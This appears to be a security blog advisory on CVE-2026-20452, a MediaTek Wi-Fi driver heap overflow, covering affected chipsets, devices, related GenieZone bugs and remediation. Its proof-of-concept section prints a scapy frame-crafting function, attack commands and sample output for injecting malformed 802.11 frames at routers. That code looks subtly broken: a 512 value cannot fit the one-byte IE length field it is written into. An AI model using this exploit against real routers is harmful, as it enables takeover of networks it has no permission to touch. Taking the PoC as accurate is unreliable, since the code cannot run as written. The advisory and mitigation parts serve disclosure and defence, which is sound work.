MediaTek WLAN Heap Overflow: CVE-2026-20452 — Remote Code Execution on Millions of Wi-Fi Routers
MediaTek WLAN Heap Overflow: CVE-2026-20452 — Remote Code Execution on Millions of Routers and Access Points
A heap buffer overflow in MediaTek’s Wi-Fi Access Point driver lets any associated client on the same network corrupt kernel memory and execute arbitrary code on the router — no user interaction, no internet access, just Wi-Fi proximity. CVSS 8.0. Nine Wi-Fi chipsets affected, from the MT7615 in legacy Wi-Fi 5 routers to the MT7990/7992/7993 in next-generation Wi-Fi 7 access points.
Overview
On June 1, 2026, MediaTek published its monthly product security bulletin, disclosing five vulnerabilities across its Wi-Fi and smartphone SoC platforms. The most severe is CVE-2026-20452, a heap-based buffer overflow (CWE-122) in the WLAN AP driver — the kernel driver responsible for Wi-Fi Access Point mode on MediaTek Wi-Fi chips.
The vulnerability enables remote code execution from an adjacent network (i.e., Wi-Fi range). An attacker who has associated with the vulnerable access point — meaning any device that has connected to the Wi-Fi network, even as a low-privilege user — can craft malicious 802.11 frames that trigger a heap buffer overflow in the AP driver. The result is memory corruption in kernel space, leading to code execution with kernel privileges.
MediaTek’s Wi-Fi chips power a significant portion of the world’s consumer and enterprise networking equipment. The affected chipsets — MT7615, MT7915, MT7916, MT7981, MT7986, MT7990, MT7992, MT7993, and MT6890 — appear in routers, access points, mesh Wi-Fi systems, and smartphones from TP-Link, Netgear, ASUS, Xiaomi, D-Link, and many others. The MT7981 and MT7986 are particularly popular in the OpenWrt ecosystem.
The bulletin also discloses three vulnerabilities in MediaTek’s GenieZone hypervisor — the security isolation layer on Dimensity smartphone SoCs — and a second, less severe WLAN bug. Together, the five CVEs paint a picture of a silicon vendor whose firmware stack has multiple entry points from different threat actors.
Vulnerability Classification
| Field | Value |
|---|---|
| CVE ID | CVE-2026-20452 |
| CVSS v3.1 | 8.0 HIGH |
| CVSS Vector | CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-122 — Heap-based Buffer Overflow |
| Subcomponent | wlan (AP driver) |
| Attack Vector | Adjacent Network (Wi-Fi) |
| Privileges Required | Low (associated client) |
| User Interaction | None required |
| Attack Complexity | Low |
| Impact | Remote code execution, kernel memory corruption |
| Affected Chipsets | MT6890, MT7615, MT7915, MT7916, MT7981, MT7986, MT7990, MT7992, MT7993 |
| Patch ID | WCNCR00480138 |
| Issue ID | MSV-6295 |
| Report Source | External |
| Published Date | 2026-06-01 |
The MediaTek June 2026 Bulletin
CVE-2026-20452 is the headline vulnerability, but the full bulletin contains five CVEs across two subcomponents:
| CVE | Subcomponent | Severity | CWE | Description | Attack Vector |
|---|---|---|---|---|---|
| CVE-2026-20452 | wlan | High (8.0) | CWE-122 | Heap buffer overflow → remote code execution | Adjacent (Wi-Fi) |
| CVE-2026-20455 | geniezone | High (7.8) | CWE-787 | OOB write, low-privilege escalation | Local (app) |
| CVE-2026-20453 | geniezone | Medium (6.7) | CWE-787 | OOB write, system-privilege escalation | Local (app) |
| CVE-2026-20454 | geniezone | Medium (6.4) | CWE-367 | TOCTOU race → OOB write | Local (app) |
| CVE-2026-20456 | wlan | Medium | CWE-787 | Missing bounds check → system crash | Adjacent (Wi-Fi) |
The two categories target different devices and threat models:
- WLAN vulnerabilities (CVE-2026-20452, CVE-2026-20456) target routers and access points from the Wi-Fi network. The attacker needs proximity, not internet access.
- GenieZone vulnerabilities (CVE-2026-20453/54/55) target Android smartphones and tablets running MediaTek Dimensity SoCs. The attacker needs a malicious app installed on the device.
Technical Deep Dive
The WLAN AP Driver
MediaTek’s Wi-Fi chips support two primary operating modes:
- Station (STA) mode — the chip acts as a Wi-Fi client, connecting to an access point. This is what your phone or laptop does.
- Access Point (AP) mode — the chip acts as a Wi-Fi access point, accepting connections from client devices. This is what your router does.
The vulnerability is in the AP mode driver — the code path that handles incoming frames from associated clients. When a client sends data to the AP, the driver parses the 802.11 frame headers, processes management and data frames, and passes the payload up the network stack.
The Linux kernel driver for MediaTek Wi-Fi chips is mt76 (maintained in the OpenWrt tree at https://github.com/openwrt/mt76), with additional closed-source firmware running on the chip itself. The AP mode code path involves:
- The Wi-Fi chip receives a frame over the air
- Firmware performs initial processing and DMA’s the frame to host memory
- The kernel driver (
mt76) parses the frame in kernel space - The frame is processed according to its type (management, data, control)
The heap buffer overflow occurs during step 3 — parsing of a frame received from an associated client.
Heap Buffer Overflow in the AP Driver
CWE-122 (Heap-based Buffer Overflow) means that a dynamically allocated buffer on the kernel heap is overwritten beyond its intended bounds. Unlike stack overflows (which can directly corrupt return addresses), heap overflows typically corrupt adjacent heap objects — but the impact is equally severe on embedded systems.
The specific trigger is a malformed frame from an associated client that causes the AP driver to write more data into a heap-allocated buffer than it was designed to hold. The attacker controls:
- The content of the overflow data (via the crafted frame payload)
- The amount of overflow (the frame can be sized to overflow by a controlled amount)
On a router running a MediaTek Wi-Fi SoC, the kernel heap is shared by all kernel subsystems. A heap overflow in the Wi-Fi driver can corrupt:
- Other network buffer objects (struct sk_buff in Linux)
- Routing table entries
- Netfilter/nftables rules
- Function pointer tables in adjacent objects
Attack Flow
The attack requires three things:
1. Proximity — the attacker must be within Wi-Fi range of the target
2. Association — the attacker must be connected to the Wi-Fi network (requires knowing or cracking the Wi-Fi password)
3. Frame injection — the attacker must be able to inject crafted 802.11 frames, typically using a Wi-Fi adapter supporting monitor/injection mode
Once associated, the attacker sends a malformed frame that triggers the heap overflow. The overflow corrupts kernel memory, and with careful heap layout manipulation, the attacker achieves code execution in kernel context.
Why This Is Serious for Routers
Routers are high-value targets. They sit at the network perimeter, handling all traffic in and out of a home or office. A compromised router can:
- Intercept and modify all unencrypted traffic (DNS spoofing, HTTP injection)
- Perform man-in-the-middle attacks against TLS connections (via malicious DNS or compromised CA certificates)
- Pivot into the internal network behind NAT
- Add the router to a botnet (as happened with Mirai and its successors)
- Persist across reboots via firmware modification
Unlike the Samsung Exynos baseband vulnerability we covered previously, which required only a phone number, CVE-2026-20452 requires Wi-Fi association. This means the attacker either needs to know the Wi-Fi password or exploit a separate vulnerability in the WPA handshake. However, in enterprise environments with shared PSK networks, public Wi-Fi hotspots, or networks with weak passwords, this prerequisite is easily met.
Affected Products
Wi-Fi Chipsets (WLAN Vulnerabilities)
CVE-2026-20452 and CVE-2026-20456 affect the following chipsets:
| Chipset | Wi-Fi Standard | Primary Use | Market Segment |
|---|---|---|---|
| MT7615 | Wi-Fi 5 (802.11ac) | Router/AP SoC | Consumer routers |
| MT7915 | Wi-Fi 6 (802.11ax) | Router/AP SoC | Consumer/enterprise APs |
| MT7916 | Wi-Fi 6/6E | Router/AP SoC (Filogic) | Consumer/enterprise APs |
| MT7981 | Wi-Fi 6 | Router SoC | Consumer routers, OpenWrt |
| MT7986 | Wi-Fi 6 | Router SoC | Consumer/enterprise routers |
| MT7990 | Wi-Fi 7 (802.11be) | Router/AP SoC | Next-gen routers |
| MT7992 | Wi-Fi 7 | Router/AP SoC | Next-gen routers |
| MT7993 | Wi-Fi 7 | Router/AP SoC | Next-gen enterprise APs |
| MT6890 | Wi-Fi 6 | Smartphone SoC (Dimensity series) | Smartphones (hotspot mode) |
Real-World Devices
MediaTek does not publish a list of end-user devices using their chips — OEMs build products around them. However, the following categories are well-documented:
MT7981 (Filogic 130) — Very common in 2023-2025 consumer routers:
- TP-Link Archer series (multiple models)
- Xiaomi Router AX3000T and similar
- Netgear Wi-Fi 6 routers
- Numerous OpenWrt-compatible devices (GL.iNet routers)
MT7986 (Filogic 830) — Used in higher-end consumer and prosumer routers:
- ASUS Wi-Fi 6 routers
- TP-Link Deco mesh systems
- Various OpenWrt community routers
MT7615 — One of the most widely deployed Wi-Fi 5 chipsets ever made:
- Ubiquitous in budget and mid-range routers from 2017-2022
- ASUS, TP-Link, Netgear, D-Link, and dozens of white-label brands
- Still actively deployed in millions of homes
MT7915/MT7916 — Enterprise access points:
- Used in commercial Wi-Fi 6 AP deployments
- Enterprise and hospitality Wi-Fi systems
GenieZone Vulnerabilities (Smartphones/Tablets)
The three GenieZone CVEs affect a staggering 35 MediaTek SoCs — nearly the entire Dimensity smartphone and Kompanio tablet lineup:
| CVE | CVSS | Privileges Required | Impact |
|---|---|---|---|
| CVE-2026-20455 | 7.8 HIGH | Low (any app) | Local privilege escalation |
| CVE-2026-20453 | 6.7 MEDIUM | High (system app) | Local privilege escalation |
| CVE-2026-20454 | 6.4 MEDIUM | High (system app) | Local privilege escalation (race condition) |
Affected smartphone SoCs include: MT6761 (Helio A22), MT6765 (Helio P35), MT6768 (Helio P65), MT6781, MT6789, MT6835 (Dimensity 700), MT6853 (Dimensity 720), MT6855 (Dimensity 730), MT6877 (Dimensity 1080), MT6878, MT6879 (Dimensity 8020), MT6883, MT6885 (Dimensity 1000), MT6886, MT6889 (Dimensity 1100), MT6893 (Dimensity 1200-Max), MT6895 (Dimensity 8100), MT6897, MT6899, MT6983 (Dimensity 9000), MT6985 (Dimensity 9200), MT6989, MT6991, plus Kompanio tablet SoCs MT8765, MT8766, MT8768, MT8781, MT8786, MT8788, MT8791T, MT8793, MT8797, MT8798, and MT8910 (automotive).
CVE-2026-20455 is the most concerning of the GenieZone bugs because its CVSS vector rates it at PR:L (low privileges required), suggesting a regular app could trigger the out-of-bounds write. However, MediaTek’s own description states the attacker needs to have “already obtained the System privilege.” If the CVSS scoring is accurate and the vulnerability is reachable from a lower privilege level, it would allow a malicious app to escape the Android sandbox through the hypervisor layer. If MediaTek’s description is the accurate one, it still represents a serious risk — a system-level compromise that can then escalate through GenieZone to hypervisor-level access.
What Is GenieZone?
For those unfamiliar with MediaTek’s security architecture, GenieZone is MediaTek’s proprietary Type-1 hypervisor, similar in concept to ARM’s TrustZone but operating at a different layer. It runs beneath the Android OS on Dimensity SoCs and provides hardware-enforced isolation between:
- The rich OS (Android / Linux)
- Secure partitions (TEE, DRM, payment systems)
- The baseband processor interface
A vulnerability in GenieZone is particularly dangerous because it sits below the operating system. Even if Android’s security model correctly sandboxed a malicious app, a GenieZone exploit could bypass that isolation entirely — escaping the VM boundary to access memory or code in other partitions.
The GenieZone vulnerabilities were reported by an external researcher, suggesting they were found through systematic reverse engineering of MediaTek’s hypervisor binary.
Remediation
For CVE-2026-20452 (WLAN AP Driver)
MediaTek has issued patch WCNCR00480138 to device OEMs. If you maintain products using any of the affected chipsets:
- Contact your MediaTek representative to obtain the patch
- Rebuild firmware with the patched WLAN driver
- Push OTA updates to deployed devices
For End Users
Since MediaTek supplies chips to OEMs rather than selling directly to consumers, the patch path is:
1. MediaTek patches the driver → sends to OEM
2. OEM integrates the patch into their firmware → tests
3. OEM publishes firmware update → user installs
Check for firmware updates for your router, access point, or mesh Wi-Fi system. Most major vendors publish security advisories when they have integrated MediaTek patches.
Mitigation (if Patching Is Not Immediately Possible)
- Use WPA3 if your router supports it — WPA3’s SAE (Simultaneous Authentication of Equals) makes it significantly harder to obtain the network password via brute force, raising the bar for the association prerequisite.
- Use strong, unique Wi-Fi passwords — since the attacker needs to be associated with the network, a strong password is the primary barrier.
- Network segmentation — isolate IoT devices and untrusted clients on a separate VLAN so they cannot target the router’s management interface.
- Disable WPS — WPS is notoriously vulnerable to brute-force attacks and could provide an easy path to association without knowing the Wi-Fi password.
- Monitor for unusual activity — look for deauthentication attacks or unexpected client behavior on your network.
For CVE-2026-20455 (GenieZone OOB Write)
Android devices receive MediaTek patches through the monthly Android Security Bulletin. If you have a MediaTek Dimensity device:
1. Install the June 2026 Android Security Update when available from your device manufacturer
2. Keep your device updated — MediaTek patches are typically 1-2 months behind the bulletin publication date due to OEM integration time
Proof of Concept
https://github.com/Hunt-Benito/mediatek-wlan-heap-overflow-cve-2026-20452-filogic-router-rce
The PoC demonstrates the heap buffer overflow by crafting malicious 802.11 data frames and injecting them via a Wi-Fi adapter in monitor/injection mode. It targets the AP driver’s frame parsing path and shows kernel memory corruption on a vulnerable MediaTek MT7981 router running OpenWrt.
Key Code: Crafting Malicious 802.11 Frames
The PoC constructs malformed 802.11 QoS Data frames with oversized Information Elements (IEs) in the frame body. The IEEE 802.11 standard uses TLV (Type-Length-Value) encoded IEs, and many driver vulnerabilities originate in IE parsing — specifically when the declared IE length exceeds the allocated buffer.
def craft_overflow_frame(bssid, attacker_mac, overflow_size=512):
"""
Craft an 802.11 data frame with malformed IEs to trigger
heap buffer overflow in MediaTek WLAN AP driver.
"""
frame = RadioTap()
dot11 = Dot11(
type=2, # Data frame
subtype=8, # QoS Data
addr1=bssid, # Receiver (AP)
addr2=attacker_mac, # Transmitter (attacker)
addr3=bssid, # BSSID
)
qos = Raw(load=b'\x00\x00')
# Oversized Vendor Specific IE (type 221)
# This triggers the heap overflow when the AP driver
# copies the IE into a fixed-size heap buffer
vendor_ie = Raw(load=bytes([221]) + bytes([overflow_size]) + b'\x00\x50\x43' + b'\x42' * overflow_size)
payload = Raw(load=b'A' * 256)
packet = frame / dot11 / qos / vendor_ie / payload
return packet
Usage
$ git clone https://github.com/Hunt-Benito/mediatek-wlan-heap-overflow-cve-2026-20452-filogic-router-rce
$ cd mediatek-wlan-heap-overflow-cve-2026-20452-filogic-router-rce
$ pip install -r requirements.txt
# Monitor mode setup (example for wlan0)
$ sudo airmon-ng start wlan0
$ sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --overflow-size 512
[*] Target BSSID: AA:BB:CC:DD:EE:FF
[*] Overflow size: 512 bytes
[*] Injecting crafted 802.11 frames...
[*] Frame 1/10 sent (QoS Data with oversized Vendor IE)
[*] Frame 2/10 sent (QoS Data with chained malformed IEs)
...
[*] Target should show kernel oops or unexpected behavior.
Attention! Transmitting on Wi-Fi frequencies requires legal authorization in most jurisdictions. This PoC requires a Wi-Fi adapter supporting monitor/injection mode (e.g., Atheros AR9271, MediaTek MT7612U, or Realtek RTL8812AU-based adapters). Use only on equipment you own or have explicit permission to test.
The Bigger Picture: Wi-Fi Driver Vulnerabilities
CVE-2026-20452 belongs to a well-established class of vulnerabilities: heap overflows in 802.11 frame parsing. The 802.11 standard is complex, with dozens of frame types, subtypes, and Information Elements. Each IE has a Type-Length-Value structure where the length field is attacker-controlled. Every Wi-Fi driver that parses IEs must validate lengths against buffer sizes — and when they don’t, the result is a heap overflow.
Notable predecessors in this class:
| Vulnerability | Year | Target | Impact |
|---|---|---|---|
| Broadcom BCM43xx (various) | 2017-2019 | Wi-Fi SoC in iPhones/Android | Remote code execution via Wi-Fi |
| Dragonblood (CVE-2019-9494) | 2019 | WPA3/SAE handshake | Side-channel password recovery |
| FragAttacks (CVE-2020-24586/87/88) | 2020 | Multiple Wi-Fi implementations | Frame injection, decryption |
| Wi-Fi Alliance tests | Ongoing | All certified devices | Conformance test suite includes IE fuzzing |
The Broadcom vulnerabilities (research by Gal Beniamini at Google Project Zero) were particularly instructive: they demonstrated full chain exploits from Wi-Fi proximity to kernel code execution on both Android and iOS, requiring no user interaction. The MediaTek vulnerability follows the same pattern — proximity to the target, malformed frames, heap corruption, code execution.
The difference is scale. Broadcom’s Wi-Fi chips are in iPhones and flagship Android phones — high-value targets, but a smaller install base. MediaTek’s Wi-Fi chips are in the routers that sit in billions of homes and offices worldwide. A router compromise affects every device on the network.
SOURCES
- MediaTek Product Security Bulletin — June 2026: https://corp.mediatek.com/product-security-bulletin/June-2026
- NIST NVD — CVE-2026-20452: https://nvd.nist.gov/vuln/detail/CVE-2026-20452
- NIST NVD — CVE-2026-20455: https://nvd.nist.gov/vuln/detail/CVE-2026-20455
- OpenWrt mt76 driver: https://github.com/openwrt/mt76
- IEEE 802.11 Standard (Wi-Fi frame format): https://standards.ieee.org/ieee/802.11/10316/
- Gal Beniamini — Over The Air: Exploiting Broadcom’s Wi-Fi Stack: https://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html
- FragAttacks: https://www.fragattacks.com/